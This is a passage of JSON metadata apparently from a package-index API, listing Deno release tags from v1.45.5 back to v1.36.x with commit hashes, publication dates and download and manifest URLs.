:"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3